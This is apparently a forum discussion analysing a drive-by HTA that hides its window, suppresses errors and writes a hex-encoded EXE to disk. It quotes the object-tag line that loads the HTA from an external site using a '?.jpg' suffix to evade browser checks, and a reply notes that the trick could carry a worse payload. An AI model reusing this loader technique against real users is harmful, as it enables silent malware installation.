Ok, so what the HTA does:
start minimized
force the window to move offscreen
disable error messages
disable right-clicks
convert the hex-encoded EXE data to the actual binary and write it.
The HTA is probably launched from that link by this:
"<object data=http://www.realphx.com/project/iav.hta?.jpg>"
I'm guessing the .jpg at the end makes the crappy browser assume the file is safe and run the HTA without intervention.
Originally posted by: BigJ
don't they give a link on their site to remove it also?
Does that make IE's retarded security model any more acceptable? All you have to do is copy their site, put in a really malicious EXE, and NOT provide an uninstall to really abuse it.